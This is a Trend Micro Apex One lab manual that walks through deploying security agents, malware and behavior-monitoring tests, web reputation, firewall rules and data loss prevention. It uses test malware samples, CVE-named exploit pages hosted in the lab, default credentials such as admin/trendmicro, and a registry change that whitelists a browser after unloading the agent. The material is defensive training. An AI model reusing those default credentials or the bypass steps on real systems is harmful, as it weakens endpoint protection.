7 In the root of C:\, double-click Apex One Installer.exe to install the Security Agent on the
Windows Server 2016 computer.
After a few moments, the Setup Wizard is displayed and the setup process completes
automatically.
8 After a few minutes, the Apex One icon will be displayed in the system tray to indicate it is
installed. Restart the computer to complete the installation process if prompted.
9 In the VM-WIN2016 virtual image, copy the Apex One Installer.exe file to the Lab Files
folder on the Windows desktop.
10 Open the VM-WIN2012 virtual machine and open the Lab Files folder on the Windows Server 2012
desktop. Double-click the Apex One Installer.exe file to launch the Security Agent setup
application.
After a few moments, the Setup Wizard is displayed and the setup process completes
automatically.
11 After a few minutes, the Apex One icon will be displayed in the system tray to indicate it is
installed. Restart the computer to complete the installation process when prompted.

Exercise 6: View the Agent List


In this exercise, the list of Agents deployed in the previous exercises will be reviewed.
1 Return to the Agent Management list in the Apex One Web Management console.

22 © 2019 Trend Micro Inc. Education


Lab 2: Installing Security Agents

2 Double click the Trend domain and the Agents installed in these exercises are displayed. Ensure
that your list matches what is displayed here.

The following methods were used to install the Security Agents in our configuration:
• DC2016: The Security Agent on this computer was installed using a setup application created
using the client packager utility.
• WIN2012: The Security Agent on this computer was installed using a setup application
created using the client packager utility.
• CLIENT-02: The Security Agent on this computer was installed using Remote Installation
from the Web Management console.
• CLIENT-03: The Security Agent on this computer was installed from the Unmanaged
Endpoint list in the Web Management console.
• CLIENT-01: The Security Agent on this computer was installed using the autopcc script.

© 2019 Trend Micro Inc. Education 23


Lab 2: Installing Security Agents

24 © 2019 Trend Micro Inc. Education


Lab 3: Grouping Security Agents
In this lab, participants will use automatic grouping techniques to organize Security Agents .

Estimated time to complete this lab: 15 minutes

Exercise 1: Create an Automatic Agent Grouping


In this exercise, a new Agent group (domain) will be created for computers hosting Security Agents. This
new domain will be created based on Agent IP addresses.
1 Open the VM-DC2016 image and in the Apex One Web Management console, click Agents > Agent
Grouping.
2 Click Create custom agent groups for existing Security Agents.

© 2019 Trend Micro Inc. Education 25


Lab 3: Grouping Security Agents

3 In the Automatic Agent Grouping pane, click Add > IP Address.

4 Click Enable grouping and configure the group with the following details:

• Name: Classroom
• IPv4 range: From 192.168.4.1
To 192.168.4.10

26 © 2019 Trend Micro Inc. Education


Lab 3: Grouping Security Agents

5 In the Agent tree pane, hover the pointer over the Trend domain and click the + icon. Type a
name for the new domain (group), for example, Classroom and click the √ icon. Click Save.

© 2019 Trend Micro Inc. Education 27


Lab 3: Grouping Security Agents

6 The grouping details are displayed. Click Save and Create Domain Now.

7 Click OK to acknowledge the message.

8 Return to Agent > Agent Management and expand the Trend domain. Note that the Classroom
group is displayed, but no Agents are collected in the new group.

28 © 2019 Trend Micro Inc. Education


Lab 3: Grouping Security Agents

9 Click the Apex One Server at the top of the Agent tree. Click Manage Agent Tree > Sort Agent.

10 Click Start to being the sorting operation.

11 Click Close when the sorting operation is complete.

© 2019 Trend Micro Inc. Education 29


Lab 3: Grouping Security Agents

12 Click the Classroom domain in the Agent tree and the Agents within the selected IP address
range are displayed.

30 © 2019 Trend Micro Inc. Education


Lab 4: Updating Security Agents
In this lab, participants verify alternate update sources for Security Agents and an Update Agent will be
created to distribute updates with the environment.

Estimated time to complete this lab: 15 minutes

Exercise 1: Verify Security Agent Update Sources


In this exercise, the update source for Security Agents will be compared when the Apex One Server is
online and offline.
1 In the VM-DC2016 image, open Apex One Web Management console. In the Agent Management
list, click the Classroom domain to display its Agents.
2 Right-click CLIENT-01, and click Settings > Privileges and Other Settings.

© 2019 Trend Micro Inc. Education 31


Lab 4: Updating Security Agents

3 Click the Other Settings tab, and ensure that Security Agents download updates from the Trend
Micro ActiveUpdate Server is enabled. Click Save.

4 A message is displayed notifying that configuration changes have been applied, click Close.

5 Open the VM-CLIENT-01 virtual machine. Right-click the Security Agent icon in the Windows
system tray and click Update Now.

32 © 2019 Trend Micro Inc. Education


Lab 4: Updating Security Agents

6 Once complete, a Component update is complete message is displayed. Click Close when the
update is complete.

7 Return to the VM-DC2016 virtual machine and click Start > Windows Administrative Tools >
Internet Information Services Manager.
8 Click to select the Apex One Server virtual website (DC2016), then right-click and click Stop. This
will disable the Apex One server and prevent Agents from retrieving updates from the Server.

9 Return to the VM-CLIENT-01 virtual machine, and run Update Now once again from the Security
Agent icon.
10 Once the update is complete, open Windows Explorer on CLIENT-01 and locate the tmudump.txt
log file located in the following folder:
...\Security Agent\AU_Data\AU_Log\

© 2019 Trend Micro Inc. Education 33


Lab 4: Updating Security Agents

11 Open the file in Windows Notepad. Locate the entries related to the two Update Now actions:
First Update Now action:

Second Update Now action:

12 Return to the VM-DC2016 virtual machine and restart the Web Server.

34 © 2019 Trend Micro Inc. Education


Lab 4: Updating Security Agents

Exercise 2: Create an Update Agent


In this exercise, the Security Agent on the CLIENT-03 computer will be promoted to become the Update
Agent for the environment.
1 In the Agent Management list, right-mouse click the CLIENT-03 computer and click Settings >
Update Agent Settings.
2 Click to enable all the options to be delivered by the Update Agent and click Save.

3 A message is displayed confirming the configuration settings have been applied. Click Close.

© 2019 Trend Micro Inc. Education 35


Lab 4: Updating Security Agents

4 The Security Agent on the CLIENT-03 computer will become the update agent for all of the
Security Agents within an IP address range. Click Updates > Agents > Update Source.
5 Click Customized Update Source and click Add.

6 Configure the IP Range and Update Source as follows:

• IPv4: From 192.168.4.1 to 192.168.4.6


• Update Source: Select CLIENT-03 from the Update Agent list
Click Save.

36 © 2019 Trend Micro Inc. Education


Lab 4: Updating Security Agents

7 The Customized Update Source list is updated. Click Notify All Agents.

8 On the VM-CLIENT-03 virtual image, navigate to the following folder in Windows Explorer to view
the update files that are available for distribution to Security Agents within the assigned range:
...\Security Agent\activeupdate

© 2019 Trend Micro Inc. Education 37


Lab 4: Updating Security Agents

38 © 2019 Trend Micro Inc. Education


Lab 5: Installing a Standalone Smart
Protection Server
In this lab, participants will configure a new standalone Smart Protection Server in the classroom
environment and integrate it into the Apex One environment.

Estimated time to complete this lab: 15 minutes

Exercise 1: Access the Smart Protection Server


Management Console
The Smart Protection Server has been already installed on a virtual machine in the lab envrionment. In
this exercise, you will access the Smart Protection Server Management console and run the
Configuration Wizard for first-time installation.
1 In the VM-DC2016 virtual machine, open Internet Explorer or Chrome and click the Smart
Protection Server bookmark or type the following URL to launch the Web console for the Smart
Protection Server:
https://192.168.4.7:4343
If a Certificate Error message is displayed, accept the Security Exception or Continue to this Web
Site.
2 The Smart Protection Server Log On window is displayed.

3 Type the administrator credentials entered during the Smart Protection Server installation and
click Log on.
• Username: admin
• Password: trendmicro

© 2019 Trend Micro Inc. Education 39


Lab 5: Installing a Standalone Smart Protection Server

4 A Welcome window is displayed. Click Configure First Time installation.

5 Accept the default selections for the File Reputation Service by clicking Next.

6 Accept the default selection for the Web Reputation service by clicking Next.

Note: You can change whether user-defined approved URLs or blocked URLs are processed first by
making a choice in the Filter Priority section.

40 © 2019 Trend Micro Inc. Education


Lab 5: Installing a Standalone Smart Protection Server

7 Disable Trend Micro Smart Feedback and click Next.

8 Leave the proxy settings disabled, and click Finish.

© 2019 Trend Micro Inc. Education 41


Lab 5: Installing a Standalone Smart Protection Server

9 The Smart Protection Server Web Management console is displayed.

10 Close the Smart Protection Server Web Management console.

Exercise 2: Add the Standalone Smart Protection


Server to Apex One
In this exercise, the Smart Protection Server will be identified as a source for Smart Protection
information within the Apex One Web Management console.
1 Return to the Apex One Web Management console, click Administration > Smart Protection >
Smart Protection Sources.
2 Click the Internal Agents tab, and click the standard list link.

42 © 2019 Trend Micro Inc. Education


Lab 5: Installing a Standalone Smart Protection Server

3 In the Standard Smart Protection Server List window, click Add.

4 Type the following details for the Smart Protection Server:


• Server: 192.168.4.7
• File Reputation Services: click to enable
• SSL: click to enable
• File Reputation Services Port: 443
Click Test Connection and ensure that the connection is successful.
• Web Reputation Services: click to enable
• Web Reputation Services Port: 5274
Click Test Connection and ensure that the connection is successful.
Click Save.

© 2019 Trend Micro Inc. Education 43


Lab 5: Installing a Standalone Smart Protection Server

5 The new Standalone Smart Protection Server is displayed in the Smart Protection Server List.
The Smart Protection Servers will be accessed by Agents based on their order in the list.

Click Save
6 Click and Notify Agents to distribute the details the Smart Protection Server to the Agents.

7 A banner in the console notifies you that Agents are being notified of the new Smart Protection
Server.

8 Open Windows Explorer and navigate to the following folder:


...\Apex One\PCCSRV

44 © 2019 Trend Micro Inc. Education


Lab 5: Installing a Standalone Smart Protection Server

9 Locate and open the sscfg.ini file to confirm that the Apex One Server is aware of the new
Smart Protection Server.

10 Open the VM-CLIENT-01 virtual image and in Windows Explorer navigate to the following folder:
...\Security Agent
11 Locate and open the ssnotify.ini file to confirm that the Security Agent is aware of the new
Smart Protection Server.

12 Close the VM-CLIENT-01 virtual image.

© 2019 Trend Micro Inc. Education 45


Lab 5: Installing a Standalone Smart Protection Server

46 © 2019 Trend Micro Inc. Education


Lab 6: Protecting Endpoint Computers
From Malware
In this lab, participants will enable malware scanning and sample malware will be accessed to trigger the
protection.

Estimated time to complete this lab: 15 minutes

Exercise 1: Configure Real-Time Scans


In this exercise, real-time scanning is configured for agents within the Trend domain.
1 In the VM-DC2016 virtual machine, log into the Apex One Web Management console.
2 In the Agent Management list, right-mouse click the Classroom domain. Click Settings > Scan
Settings > Real-time Scan Settings.

By configuring Real-time Scan Settings at the Classroom branch of the Agent tree, all Agents in
this domain will inherit the settings.

© 2019 Trend Micro Inc. Education 47


Lab 6: Protecting Endpoint Computers From Malware

3 On the Target tab, ensure that Enable virus/malware scan and Enable spyware/grayware scan are
both enabled. Click to enable File types scanned by Intelliscan.

48 © 2019 Trend Micro Inc. Education


Lab 6: Protecting Endpoint Computers From Malware

4 On the Action tab, click Use the same action for all virus/malware types, and set the 1st Action for
All types to Quarantine. Click Save.

5 A message is displayed notifying that configuration changes have been applied, click Close.

6 In the virtual application, open the VM-CLIENT-02 virtual machine and log into Windows 10.

© 2019 Trend Micro Inc. Education 49


Lab 6: Protecting Endpoint Computers From Malware

7 Double-click the Apex One icon in the Windows system tray to display the console.

8 Click the Connection Status icon and note that Real-time Scan is enabled.

Exercise 2: Test Virus/Malware Scans


1 On the CLIENT-02 computer, open Internet Explorer. A message regarding add-ons will be
displayed in the browser.

50 © 2019 Trend Micro Inc. Education


Lab 6: Protecting Endpoint Computers From Malware

2 Click Choose add-ons. In the list, click to Enable All to enable the Trend Micro add-ons and click
Done.

Note: These add-ons are used for Web Reputation, but since this is the first time the browser is
accessed since the Security Agent was added to the computer, the prompt to enable the add-ons
is displayed now.

3 In the browser, type the following URL to access the EICAR web site:
http://2016.eicar.org/85-0-Download.html
4 Click to download the eicar.com test file.

© 2019 Trend Micro Inc. Education 51


Lab 6: Protecting Endpoint Computers From Malware

5 When prompted, do not save or run the file. Wait a moment and a notification about malware
being downloaded is displayed on the Windows 10 desktop.

6 Click Cancel to terminate the eicar.com download.

7 Click the number 1 in the Threats/Violations Found alert window next to Virus/Malware to open
the Logs viewer for this endpoint computer.

Review the details of the logged event and click Close. Close the Threat/Violations Found alert
window as well.

Note: Even though the malware file was not saved to the computer by clicking Save, the browser still
cached the malware download and triggered the real-time scan.

8 Return to the VM-DC2016 virtual machine and in the Apex One Web Management console, locate
the CLIENT-02 computer in the Agent list.

52 © 2019 Trend Micro Inc. Education


Lab 6: Protecting Endpoint Computers From Malware

9 Right-mouse click the computer and click Logs > Virus/Malware Logs. Accept the default criteria
and click Display Logs.

10 The details of the event generated by the malware capture will be displayed.

Click Close.

Note: It may take a few minutes for the Security Agent to forward its logs to the Apex One Server. If
the log entry does not display, try again in a couple of minutes.

Exercise 3: Test Spyware/Grayware Scans


1 Return to the CLIENT-02 computer, locate and open the Lab Files folder on the Windows 10
desktop. In this shared folder, double-click the Spyware_Test_Files folder.
2 Drag the Spyware_Files_Password_novirus.zip file from the shared folder to the Windows 10
desktop.

© 2019 Trend Micro Inc. Education 53


Lab 6: Protecting Endpoint Computers From Malware

3 Once on the Windows 10 desktop, right-mouse click the file and click Extract All. Accept the
default location and click Extract.

4 When prompted, type the archive password of novirus and click OK.
5 Wait a moment and a notification about spyware/grayware being detected is displayed on the
Windows 10 desktop.

6 Close the Threat/Violations Found window.


7 Return to the VM-DC2016 virtual machine and in the Apex One Web Management console, locate
the CLIENT-02 computer in the Agent list.

54 © 2019 Trend Micro Inc. Education


Lab 6: Protecting Endpoint Computers From Malware

8 Right-mouse click the computer and click Logs > Spyware/Grayware Logs. Accept the default
criteria and click Display Logs.

9 The details of the events generated by the spyware capture will be displayed.

Click Close.

Note: It may take a few minutes for the Security Agent to forward its logs to the Apex One Server. If
the log entry does not display, try again in a couple of minutes.

Exercise 4: View Quarantined Files


In this exercise, participants will view the files quarantined by the Security Agent.
1 Back on the VM-CLIENT-02 virtual machine, open Windows Explorer, and navigate to the
quarantine folder at the following location to verify if there are any quarantine files (these will
be identified with a .qtn extension:
...\Security Agent\Suspect\Backup
2 Still in Windows Explorer, navigate to the following folder on the CLIENT-02 computer:
...\Security Agent

© 2019 Trend Micro Inc. Education 55


Lab 6: Protecting Endpoint Computers From Malware

3 Double-click vsencode.exe to open the Restore utility:


A list of the quarantined file in the folder is displayed.

Note the exact naming of the quarantined virus, for example, eicar[1].com and click Close.
4 Return to the Apex One Server Web Management console on the VM-DC2016 virtual machine.
5 In the Agent Management list, click the Classroom domain to view its Agents. Right-click the
CLIENT-02 computer in the Agent tree and click Tasks > Central Quarantine Restore.

56 © 2019 Trend Micro Inc. Education


Lab 6: Protecting Endpoint Computers From Malware

6 In the Central Quarantine Restore Criteria window, type the name of the infected file as displayed
in the Restore Encrypted Virus utility (for example, eicar[1].com) and click Search.

7 In the Central Quarantine Restore window, the option to restore the file is available by selecting
the file and clicking Restore. Optionally, click Add restored file to the domain-level exclusion list
to no longer identify this file as malware.

Click Close without restoring the file.

© 2019 Trend Micro Inc. Education 57


Lab 6: Protecting Endpoint Computers From Malware

58 © 2019 Trend Micro Inc. Education


Lab 7: Protecting Endpoint Computers
Through Behavior Monitoring
In this lab, participants will access an unknown application will be accessed to trigger Malicious Behavior
Detection.

Estimated time to complete this lab: 10 minutes

Exercise 1: Block Newly Encountered Software


In this exercise, a software application that has not been encountered previously will be blocked.
1 On the VM-DC2016 virtual machine, open the Apex One Web Management console.
2 In the Agent Management list, click the Classroom domain to display its Agents.
3 Right-mouse click CLIENT-02 and click Settings > Behavior Monitoring Settings. Ensure that
Monitor newly encountered programs... is enabled along with Prompt User. Click Save.

© 2019 Trend Micro Inc. Education 59


Lab 7: Protecting Endpoint Computers Through Behavior Monitoring

4 A message is displayed confirming the configuration settings have been applied. click Close.

5 Log back into the VM-CLIENT-02 virtual image and access the sample detection Web site by
clicking the Detections bookmark in the browser or typing the following URL:
http://detection.trend.local
6 Click the suspicious link and save the file to the desktop.

Note: Ignore any Windows messages related to the unknown application, if displayed.

7 Double-click the suspicious.exe file on the desktop and click Run.

60 © 2019 Trend Micro Inc. Education


Lab 7: Protecting Endpoint Computers Through Behavior Monitoring

8 In a moment, a Newly Encountered Program Detected message should be displayed. In this case,
the Census feature detects that this file has a low prevalence, and the Security Agent becomes
suspicious of the file. Do not click any of the options at this point, instead allow the Time out
value to expire.

9 Since the program was not allowed within the defined timeout, a second notification will appears
in a moment displaying that the threat was blocked through Malicious Behavior Detection.

© 2019 Trend Micro Inc. Education 61


Lab 7: Protecting Endpoint Computers Through Behavior Monitoring

10 Click the number 1 next to Malicious Behavior Detections to open the Log viewer.

11 Click Close once you have examined the details of the detection. Close the Threats/Violations
Found alert.
12 Return to the VM-DC2016 virtual machine and in the Apex One Web Management console, locate
the CLIENT-02 computer in the Agent list.
13 Right-mouse click the computer and click Logs > Behavior Monitoring Logs. Accept the default
criteria and click Display Logs.

14 The details of the event generated by behavior monitoring will be displayed.

Click Close.

Note: It may take a few minutes for the Security Agent to forward its logs to the Apex One Server. If the
log entry does not display, try again in a couple of minutes.

62 © 2019 Trend Micro Inc. Education


Lab 8: Protecting Endpoint Computers
From Unknown Threats
In this lab, participants will enable Predictive Machine Learning and sample malware will be accessed to
trigger protection. In addition, an unknown application will be accessed to trigger Malicious Behavior
Detection.

Estimated time to complete this lab: 10 minutes

Exercise 1: Enable Predictive Machine Learning


1 On the VM-DC2016 virtual machine, open the Apex One Web Management console.
2 In the Agent Management list, right-mouse click CLIENT-02 and click Settings > Predictive
Machine Learning Settings. Ensure that Enable Predictive Machine Learning is selected and
ensure that only the Type of File is enabled. Click Save.

© 2019 Trend Micro Inc. Education 63


Lab 8: Protecting Endpoint Computers From Unknown Threats

3 A message is displayed confirming the configuration settings have been applied. Click Close.

4 In the virtual application, click the VM-CLIENT-02 image. Return to the Detections demo site.
5 Click trendx_detect to download a malware sample.

6 Do not run or save the file. After a moment, a Threats/Violations Found notification should be
displayed.

7 Click Cancel on the download message.

64 © 2019 Trend Micro Inc. Education


Lab 8: Protecting Endpoint Computers From Unknown Threats

8 Click the number link next to Unknown Threats to display additional information regarding the
threat, including that Predictive Machine Learning caught the potential malware.

9 Click Close in the Logs window. Close the Threats/Violations Found alert.
10 Return to the VM-DC2016 image and log into the Apex One Web Management console. Locate
and right-mouse click CLIENT-02. Click Logs > Predictive Machine Learning Logs. Accept the
default criteria and click Display Logs.

11 Examine the details related to this violation. It make take a few minutes for the log event to
display.

© 2019 Trend Micro Inc. Education 65


Lab 8: Protecting Endpoint Computers From Unknown Threats

12 Click View on the far right side to obtain additional information about the file detection.

13 Click Close when done.

66 © 2019 Trend Micro Inc. Education


Lab 9: Blocking Web Threats
In this lab, participants will configure Web Reputation and sample Web sites will be accessed.

Estimated time to complete this lab: 15 minutes

Exercise 1: Enable Web Reputation


1 In the VM-DC2016 image, open the Apex One Web Management console.
2 In the Agent Management list, right-click the Classroom domain. Click Settings > Web Reputation
Settings.

Note: Ensure that only the Classroom domain is selected when applying these settings. If an Agent in
the domain is selected in the Agent list when right-mouse clicking the Classroom domain, the
settings will only apply to that Agent.

3 On the Internal Agents tab, confirm that Web Reputation is enabled for Windows desktops and
set the Security Level for these agents to Medium.
In addition, disable Send queries to Smart Protection Servers. This will ensure that the requests
are sent to the Smart Protection Network. Leave all other settings at their defaults and click
Save.

© 2018 Trend Micro Inc. Education 67


Lab 9: Blocking Web Threats

4 A confirmation will be displayed to inform that the configuration changes have been applied.
Click Close.

5 In the virtual application, open the VM-CLIENT-03 virtual machine.


6 On the Windows 10 computer, open Internet Explorer. A message regarding add-ons will be
displayed in the browser.

68 © 2018 Trend Micro Inc. Education


Lab 9: Blocking Web Threats

7 Click Choose add-ons. In the list, click to Enable All to enable the Trend Micro add-ons and click
Done.

8 In Internet Explorer, access the sample web sites listed below and note what happens when you
attempt to access each of these sites:
• wrs81.winshipway.com
• wrs71.winshipway.com
• wrs31.winshipway.com
Sites with a score of 65 or lower should be blocked (since Medium level is set) and the Web
browser will display the following message.

© 2018 Trend Micro Inc. Education 69


Lab 9: Blocking Web Threats

In addition, a Malicious URLs alert should be displayed.

9 Click the number next to Malicious URLs to open the Web Reputation Logs. Note the entries for
the blocked Web site, then click Close. Close the Threats/Violations Found alert.

10 Navigate to the following folder and locate the OfcUrlf.log file:


…\Security Agent\Misc
11 Open the file in Notepad and locate the details for which websites were blocked.

12 In Internet Explorer, clear the browsing history and close the browser.

70 © 2018 Trend Micro Inc. Education


Lab 9: Blocking Web Threats

Exercise 2: Add an Application to the Web Reputation


Whitelist
In this exercise, participants will configure Web Reputation to ignore requests made by specific
applications. In this example, Internet Explorer will be added to the Whitelist.
1 Still on the VM-CLIENT-03 image, right-click the Security Agent icon in the system tray and click
Unload Security Agent.

2 When prompted, type the unload password entered during setup of the Apex One Server, for
example, trendmicro. Wait for the Agent icon to disappear from the system tray before
continuing.

3 Open the Registry Editor (regedit) and locate the following entry:
[HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\Osprey\WhiteList]
4 Right-mouse click Whitelist and click New > Key. Create a new key called Internet Explorer.

Note: Agent Self-Protection prevents any modification to the Apex One Registry keys. If the Security
Agent is not completely unloaded, you may be prevented from creating this new key. If an error is
displayed when trying to create the key, try again after a couple of minutes to allow the Agent to
finish the unloading process.

5 Right-mouse click Internet Explorer and click New > String Value. Type the Value name of
ProcessImageName.
6 Right-mouse click ProcessImageName and click Modify. Type the Value data of iexplore.exe.

© 2018 Trend Micro Inc. Education 71


Lab 9: Blocking Web Threats

Note: Ensure that the name of the Value data is iexplore.exe (not iexplorer.exe)

7 Close the Registry Editor and restart the Security Agent by clicking Start > Trend Micro Apex One
Security Agent > Security Agent. Wait for the agent icon to appear in the system tray before
continuing.
8 Open the Chrome browser and enter the following URL:
http://wrs31.winshipway.com
The connection should be blocked.
9 Open Internet Explorer and enter the same URL. The connection should be allowed as Internet
Explorer is on the whitelist.

Exercise 3: Protect Endpoint Computers From


Browser Exploits
In this exercise, malware scanning, web reputation and memory scans will be combined to protect the
endpoint computers from known browser exploits.
1 Return to the VM-DC2016 virtual image and in the Agent Management list, right-mouse click the
Classroom domain, and click Settings > Additional Service Settings.

2 As the memory scan feature requires Behavior Monitoring to be enabled, confirm that
Unauthorized Change Prevention Service is enabled for Windows desktops, along with the
Advanced Protection Service section.

72 © 2018 Trend Micro Inc. Education


Lab 9: Blocking Web Threats

By default, this service should be enabled. This is the Common Control Solution Framework.

Click Save.
3 A confirmation of the configuration change is displayed. Click Close

4 Right-mouse click the Classroom domain again, this time click Settings > Web Reputation
Settings.

© 2018 Trend Micro Inc. Education 73


Lab 9: Blocking Web Threats

5 On the Internal Agents tab, scroll to locate the Browser Exploit Prevention section and ensure
that Block pages containing malicious scripts is enabled.

Click Save.
6 A confirmation of the Web Reputation configuration change is displayed. Click Close

74 © 2018 Trend Micro Inc. Education


Lab 9: Blocking Web Threats

7 Open the VM-CLIENT-02 virtual machine. On the Windows 10 desktop, open the Internet Explorer
browser. Click Tools and confirm that the Trend Micro add-ons are present in Internet Explorer
by navigating to Manage add-ons. Under Toolbars and Extensions the add-ons should appear. If
not already enabled (completed in a previous lab), select each add-on and click Enable.

8 In Internet Explorer, type the following URL to access some sample Web pages:
• http://192.168.4.1/CVE-2009-1568.htm
• http://192.168.4.1/CVE-2009-1569.htm
• http://192.168.4.1/CVE-2009-3867.htm
• http://192.168.4.1/CVE-2009-3869.htm
Since these pages contain malicious scripts, a policy violation message should be displayed.

© 2018 Trend Micro Inc. Education 75


Lab 9: Blocking Web Threats

9 Click the number link next to Malicious URLs (this number may vary) to display the log entries for
these pages accesses. Set the time range to Last 24 hours. Further details on each violation are
displayed. Click Close once you have noted the details. Close the Threats/Violations Found alert.

10 Return to the VM-DC2016 virtual machine and in the Apex One Web Management console, locate
the CLIENT-02 computer in the Agent list.
11 Right-mouse click the computer and click Logs > Web Reputation Logs. Accept the default criteria
and click Display Logs.

12 The details of the events generated by the accesses to Web pages containing the malicious
scripts will be displayed.

Click Close.

76 © 2018 Trend Micro Inc. Education


Lab 10: Protecting Endpoint Computers
Through Traffic Filtering
In this lab, participants will create a new firewall policy and profile to block Internet connections from an
endpoint computer.

Estimated time to complete this lab: 15 minutes

Exercise 1: Enable the Firewall Service


In this exercise, Firewall services will be enabled for a domain.
1 Open the VM-DC2016 virtual machine and log into the Apex One Web Management console.
2 In the Agent Management list, right-click the Classroom domain. Click Settings > Additional
Service Settings.

© 2018 Trend Micro Inc. Education 77


Lab 10: Protecting Endpoint Computers Through Traffic Filtering

3 Ensure that the Firewall Service is enabled for Windows desktop computers.

Note: Firewall services were enabled during the setup of Apex One on the virtual machine.

4 Click Save to apply the settings to the domain.


5 A confirmation will be displayed to inform you that the configuration changes have been applied.
Click Close.

Exercise 2: Create a Firewall Policy


In this exercise, a new policy will be created to block Web traffic.

78 © 2018 Trend Micro Inc. Education


Lab 10: Protecting Endpoint Computers Through Traffic Filtering

1 Still in the Apex One Web Management console, click Agents > Firewall > Policies. The list of
default Firewall policies is displayed.

2 Click Add and create a policy to allow all traffic through the Apex One firewall with the following
details:
• Name: Exercise Firewall Policy
• Security level : Low
• Enable Firewall: Ensure this Firewall Feature item is enabled
• Display a notification when a Firewall violation is detected: enabled

3 In the Exception pane, click Add and create an exception to block Web traffic with the following
details.
• Name: Block HTTP and HTTPS
• Application: All applications
• Action: Deny network traffic
• Direction: Inbound and Outbound enabled
• Protocol: TCP
• Specific Ports: 80,443
• IP address(es): All IP addresses

© 2018 Trend Micro Inc. Education 79


Lab 10: Protecting Endpoint Computers Through Traffic Filtering

Click Save.
4 The new Exception is displayed. Click the up arrow in the Order column multiple times to move
the new exception above the default HTTP and HTTPS exceptions.

Click Save.

80 © 2018 Trend Micro Inc. Education


Lab 10: Protecting Endpoint Computers Through Traffic Filtering

5 The new policy is displayed in the list.

Exercise 3: Create a Firewall Profile


In this exercise, a new firewall profile will be created, allowing the new policy to be applied to Agents.
1 Still in the Apex One Web Management console, click Agents > Firewall > Profiles. The list of
default profiles is displayed.

2 Click Add to create a new profile with the following details:


• Enable this profile: ensure this profile is enabled
• Name: Blocked Agent
• Description: Type an optional description
• Policy: Select Exercise Firewall Policy
• Endpoint: Click to enable Endpoint, then click Select Endpoints from the Agent Tree . Locate
the CLIENT-02 endpoint from the Classroom domain. Click Select .
Click Save.

© 2018 Trend Micro Inc. Education 81


Lab 10: Protecting Endpoint Computers Through Traffic Filtering

3 Click Apply Profile to Agents.


A banner is displayed in the console advising you that the Security Agents are being notified of
the new settings.

Exercise 4: Verify the Firewall Deployment


In this exercise, the Agent list will be viewed to confirm the deployment of the Firewall components.
1 Still in the Apex One Web Management console, click Agents > Agent Management. Click the
Classroom domain to view its Agents.

82 © 2018 Trend Micro Inc. Education


Lab 10: Protecting Endpoint Computers Through Traffic Filtering

2 Click Firewall view from the Agent tree view list.

3 Confirm there is a green check mark in the Firewall column for CLIENT-02.

4 In the vApp, open the VM-CLIENT-02 virtual image.

© 2018 Trend Micro Inc. Education 83


Lab 10: Protecting Endpoint Computers Through Traffic Filtering

5 Double-click the Apex One icon in the Windows system tray to open the console. Click Settings at
the bottom of the console window. On the Protection tab, click Firewall from the list. Note the
name of the policy in effect on this endpoint.

Click Cancel to close the Settings window.


6 Still on the CLIENT-02 computer, open the Windows Command Prompt as an administrator and
navigate to the following folder:
C:\Program Files (x86)\Trend Micro\Security Agent

Note: The Command Prompt shortcut on the toolbar launches with administrator permissions. If
launching Command Prompt from the Windows menu, right-mouse click the item and click More
> Run as administrator.

7 Type the following command to generate a dump file of the firewall rules in effect on this
endpoint computer:
tmpfw dump
8 In Windows Explorer, locate and open the resulting dump file called !PfwDump.txt in the
following folder:
...\Security Agent

84 © 2018 Trend Micro Inc. Education


Lab 10: Protecting Endpoint Computers Through Traffic Filtering

9 Open the file in Notepad. Locate the entries for the exceptions to block ports 80 and 443.

10 On the Windows 10 desktop, open a web browser and browse to a random web site. The site
should be blocked. After a moment, a firewall violation notification message should be displayed
on the agent endpoint.

© 2018 Trend Micro Inc. Education 85


Lab 10: Protecting Endpoint Computers Through Traffic Filtering

11 Click the number next to Firewall Violations or Network Viruses to view logging details regarding
the firewall violation.

12 Return to the VM-DC2016 image and in the Apex One Web Management console, locate and right-
mouse click CLIENT-02. Click Logs > Firewall Logs. Accept the default criteria and click Display
Logs.

13 Examine the details related to this violation. It make take a few minutes for the log event to
display then click Close.

Exercise 5: Disable the Firewall Policy


In this exercise, the firewall policy blocking access to HTTP and HTTPS will be deleted so as not to impact
the Agent’s access to the Internet.
1 Return to the Apex One Web Management console and click Agents > Firewall > Profiles. The list of
current profiles is displayed

86 © 2018 Trend Micro Inc. Education


Lab 10: Protecting Endpoint Computers Through Traffic Filtering

2 Click to select the Blocked Agent profile and click Delete.

3 Click Apply Profiles to Agents.


4 A message is displayed advising you that the Security Agents are being notified of the new
settings.

5 After a moment, return to the VM-CLIENT-02 virtual machine and attempt to browse to a random
Web site. The site should be displayed.

© 2018 Trend Micro Inc. Education 87


Lab 10: Protecting Endpoint Computers Through Traffic Filtering

88 © 2018 Trend Micro Inc. Education


Lab 11: Preventing Data Loss
In this lab, participants will enable Apex One Data Protection and configure it to block specific data from
leaving the endpoint computer.

Estimated time to complete this lab: 20 minutes

Exercise 1: Install the Data Protection Plug-In


1 Open the VM-DC2016 image, and log into the Apex One Server Web Management console.
2 Click Plug-ins and in the Apex One Data Protection section, click Download. Click OK to proceed
with the download when prompted.

A progress bar is displayed as the plug-in is downloaded.

© 2019 Trend Micro Inc. Education 89


Lab 11: Preventing Data Loss

3 When the download is complete, click Install Now.

4 When prompted, click Agree to accept the license agreement.

5 In the Apex One Data Protection section, click Manage Program.

90 © 2019 Trend Micro Inc. Education


Lab 11: Preventing Data Loss

6 Provide an Activation Code for the Apex One Data Protection plug-in. An Activation Code is
located in the Product Cloud activation code.txt file in the Lab Files folder on the
Windows Server 2016 desktop. Copy and paste the activation code into the Web form and click
Save.

7 The Apex One Data Protection page is displayed.

© 2019 Trend Micro Inc. Education 91


Lab 11: Preventing Data Loss

8 In the Web Management console, a new Data Loss Prevention menu item should now appear
under the Agents menu.

Exercise 2: Configure Data Identifiers


Now that Apex One Data Protection has been activated, participants will begin by configuring a new Data
Identifier.
1 In the Apex One Server Web Management console, click Agents > Data Loss Prevention > Data
Identifiers.
2 In the Data Identifiers window, click the Keyword Lists tab and click Add.

3 In the Properties section, configure the following settings:


• Name: Jack Taylor
• Criteria: Combined score for keywords exceeds threshold
• Score Threshold: 9

92 © 2019 Trend Micro Inc. Education


Lab 11: Preventing Data Loss

4 In the Keywords section, add the following words and assign the listed scores. Click Add after
each one to append the word to the list.
Keyword Score
contract 3
Taylor 2
confidential 5
Case sensitive disabled for each of the keywords

© 2019 Trend Micro Inc. Education 93


Lab 11: Preventing Data Loss

5 The Keywords List will display the custom keywords and their corresponding score.

Click Save.
6 A success message is displayed. Click Close.

Exercise 3: Configure a Data Leak Prevention


Template
